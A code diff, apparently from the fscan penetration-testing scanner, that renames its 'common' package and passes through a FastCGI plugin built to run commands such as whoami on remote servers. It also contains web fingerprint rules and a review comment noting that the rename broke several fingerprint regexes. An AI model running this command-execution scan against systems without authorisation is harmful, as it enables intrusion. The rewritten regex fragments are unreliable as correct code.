@@ -49,13 +49,13 @@ func GOWebTitle(info *Config.HostInfo) (err error, CheckData []WebScan.CheckData info.Url = fmt.Sprintf("https://%s", info.Host) default: host := fmt.Sprintf("%s:%s", info.Host, info.Ports) - protocol := GetProtocol(host, common.Timeout) + protocol := GetProtocol(host, Common.Timeout) info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports) } } else { if !strings.Contains(info.Url, "://") { host := strings.Split(info.Url, "/")[0] - protocol := GetProtocol(host, common.Timeout) + protocol := GetProtocol(host, Common.Timeout) info.Url = fmt.Sprintf("%s://%s", protocol, info.Url) } } @@ -113,14 +113,14 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er if err != nil { return err, "", CheckData } - req.Header.Set("User-agent", common.UserAgent) - req.Header.Set("Accept", common.Accept) + req.Header.Set("User-agent", Common.UserAgent) + req.Header.Set("Accept", Common.Accept) req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9") - if common.Cookie != "" { - req.Header.Set("Cookie", common.Cookie) + if Common.Cookie != "" { + req.Header.Set("Cookie", Common.Cookie) } - //if common.Pocinfo.Cookie != "" { - // req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie) + //if Common.Pocinfo.Cookie != "" { + // req.Header.Set("Cookie", "rememberMe=1;"+Common.Pocinfo.Cookie) //} else { // req.Header.Set("Cookie", "rememberMe=1") //} @@ -162,7 +162,7 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er if reurl != "" { result += fmt.Sprintf(" 跳转url: %s", reurl) } - common.LogSuccess(result) + Common.LogSuccess(result) } if reurl != "" { return nil, reurl, CheckData @@ -233,7 +233,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) { return } - socksconn, err := common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second) + socksconn, err := Common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second) if err != nil { return } 
@@ -242,7 +242,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) { if conn != nil { defer func() { if err := recover(); err != nil { - common.LogError(err) + Common.LogError(err) } }() conn.Close() diff --git a/Plugins/fcgiscan.go b/Plugins/fcgiscan.go index a14776c..ba7b696 100644 --- a/Plugins/fcgiscan.go +++ b/Plugins/fcgiscan.go @@ -6,8 +6,8 @@ import ( "encoding/binary" "errors" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "io" "strconv" "strings" @@ -22,14 +22,14 @@ import ( // FcgiScan 执行FastCGI服务器漏洞扫描 func FcgiScan(info *Config.HostInfo) error { // 如果设置了暴力破解模式则跳过 - if common.IsBrute { + if Common.IsBrute { return nil } // 设置目标URL路径 url := "/etc/issue" - if common.Path != "" { - url = common.Path + if Common.Path != "" { + url = Common.Path } addr := fmt.Sprintf("%v:%v", info.Host, info.Ports) @@ -38,10 +38,10 @@ func FcgiScan(info *Config.HostInfo) error { var cutLine = "-----ASDGTasdkk361363s-----\n" // 用于分割命令输出的标记 switch { - case common.Command == "read": + case Common.Command == "read": reqParams = "" // 读取模式 - case common.Command != "": - reqParams = fmt.Sprintf("", common.Command, cutLine) // 自定义命令 + case Common.Command != "": + reqParams = fmt.Sprintf("", Common.Command, cutLine) // 自定义命令 default: reqParams = fmt.Sprintf("", cutLine) // 默认执行whoami } @@ -65,7 +65,7 @@ func FcgiScan(info *Config.HostInfo) error { } // 建立FastCGI连接 - fcgi, err := New(addr, common.Timeout) + fcgi, err := New(addr, Common.Timeout) defer func() { if fcgi.rwc != nil { fcgi.rwc.Close() @@ -97,7 +97,7 @@ func FcgiScan(info *Config.HostInfo) error { result = fmt.Sprintf("[+] FastCGI漏洞确认 %v:%v\n命令输出:\n%v", info.Host, info.Ports, output) } - common.LogSuccess(result) + Common.LogSuccess(result) } else if strings.Contains(output, "File not found") || strings.Contains(output, "Content-type") || strings.Contains(output, "Status") { 
@@ -109,7 +109,7 @@ func FcgiScan(info *Config.HostInfo) error { result = fmt.Sprintf("[*] FastCGI服务确认 %v:%v\n响应:\n%v", info.Host, info.Ports, output) } - common.LogSuccess(result) + Common.LogSuccess(result) } return nil @@ -187,7 +187,7 @@ type FCGIClient struct { } func New(addr string, timeout int64) (fcgi *FCGIClient, err error) { - conn, err := common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second) fcgi = &FCGIClient{ rwc: conn, keepAlive: false, diff --git a/WebScan/InfoScan.go b/WebScan/InfoScan.go index 5dcc449..0a6dc18 100644 --- a/WebScan/InfoScan.go +++ b/WebScan/InfoScan.go @@ -3,8 +3,8 @@ package WebScan import ( "crypto/md5" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/WebScan/info" - "github.com/shadow1ng/fscan/common" "regexp" ) @@ -39,7 +39,7 @@ func InfoCheck(Url string, CheckData *[]CheckDatas) []string { if len(infoname) > 0 { result := fmt.Sprintf("[+] InfoScan %-25v %s ", Url, infoname) - common.LogSuccess(result) + Common.LogSuccess(result) return infoname } return []string{""} diff --git a/WebScan/WebScan.go b/WebScan/WebScan.go index a2e3ca3..15025bb 100644 --- a/WebScan/WebScan.go +++ b/WebScan/WebScan.go @@ -3,9 +3,9 @@ package WebScan import ( "embed" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/WebScan/lib" - "github.com/shadow1ng/fscan/common" "net/http" "os" "path/filepath" @@ -20,7 +20,7 @@ var AllPocs []*lib.Poc func WebScan(info *Config.HostInfo) { once.Do(initpoc) - var pocinfo = common.Pocinfo + var pocinfo = Common.Pocinfo buf := strings.Split(info.Url, "/") pocinfo.Target = strings.Join(buf[:3], "/") 
@@ -34,25 +34,25 @@ func WebScan(info *Config.HostInfo) { } } -func Execute(PocInfo common.PocInfo) { +func Execute(PocInfo Common.PocInfo) { req, err := http.NewRequest("GET", PocInfo.Target, nil) if err != nil { errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err) - common.LogError(errlog) + Common.LogError(errlog) return } - req.Header.Set("User-agent", common.UserAgent) - req.Header.Set("Accept", common.Accept) + req.Header.Set("User-agent", Common.UserAgent) + req.Header.Set("Accept", Common.Accept) req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9") - if common.Cookie != "" { - req.Header.Set("Cookie", common.Cookie) + if Common.Cookie != "" { + req.Header.Set("Cookie", Common.Cookie) } pocs := filterPoc(PocInfo.PocName) - lib.CheckMultiPoc(req, pocs, common.PocNum) + lib.CheckMultiPoc(req, pocs, Common.PocNum) } func initpoc() { - if common.PocPath == "" { + if Common.PocPath == "" { entries, err := Pocs.ReadDir("pocs") if err != nil { fmt.Printf("[-] init poc error: %v", err) @@ -67,8 +67,8 @@ func initpoc() { } } } else { - fmt.Println("[+] load poc from " + common.PocPath) - err := filepath.Walk(common.PocPath, + fmt.Println("[+] load poc from " + Common.PocPath) + err := filepath.Walk(Common.PocPath, func(path string, info os.FileInfo, err error) error { if err != nil || info == nil { return err diff --git a/WebScan/info/rules.go b/WebScan/info/Rules.go similarity index 98% rename from WebScan/info/rules.go rename to WebScan/info/Rules.go index e7184db..d4d1dd5 100644 --- a/WebScan/info/rules.go +++ b/WebScan/info/Rules.go 
@@ -72,7 +72,7 @@ var RuleDatas = []RuleData{ {"atmail-WebMail", "cookie", "(atmail6)"}, {"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"}, {"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|Hypertext Transfer Protocol -- HTTP/1.1)"}, - {"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"}, + {"致远OA", "code", "(/seeyon/Common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"}, {"discuz", "code", "(content=\"Discuz! X\")"}, {"Typecho", "code", "(Typecho)"}, {"金蝶EAS", "code", "(easSessionId)"}, @@ -88,10 +88,10 @@ var RuleDatas = []RuleData{ {"CISCO_EPC3925", "code", "(Docsis_system)"}, {"CISCO ASR", "code", "(CISCO ASR)"}, {"H3C ER3200", "code", "(ER3200系统管理)"}, - {"万户oa", "code", "(/defaultroot/templates/template_system/common/css/|/defaultroot/scripts/|css/css_whir.css)"}, + {"万户oa", "code", "(/defaultroot/templates/template_system/Common/css/|/defaultroot/scripts/|css/css_whir.css)"}, {"Spark_Master", "code", "(Spark Master at)"}, {"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"}, - {"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"}, + {"蓝凌OA", "code", "(/scripts/jquery.landray.Common.js)"}, {"深信服ssl-vpn", "code", "(login_psw.csp)"}, {"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"}, {"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"}, 
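Review bot: The three `code` patterns rewritten in these two hunks (`/seeyon/common/` in the hunk at line 72, `/defaultroot/templates/template_system/common/css/` and `/scripts/jquery.landray.common.js` in the hunk at line 88) are regexes matched against a target's HTTP response, not references to the renamed `Common` package, so capitalising them looks like collateral damage from the search-and-replace that did the package rename. URL paths and script names are case-sensitive and Go's `regexp` is case-sensitive by default, so unless the rule matcher compiles these with a case-insensitive flag, the 致远OA, 万户oa and 蓝凌OA fingerprints will silently stop matching after this commit. The same problem appears with `coremail/Common` in the hunk at line 229 below. The fix is to restore the original fragments, `/seeyon/common/`, `template_system/common/css/`, `jquery.landray.common.js` and `coremail/common`, and it would be worth a small test that each rule still matches its own sample response so a future rename cannot regress the fingerprint table again. The enclosing `RuleDatas` literal starts and ends outside these hunks.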
@@ -229,14 +229,14 @@ var RuleDatas = []RuleData{ {"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"}, {"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"}, {"Huawei SMC", "code", "(Script/SmcScript.js?version=)"}, - {"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"}, + {"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/Common)"}, {"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"}, {"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"}, {"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"}, {"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|Hypertext Transfer Protocol -- HTTP/1.1|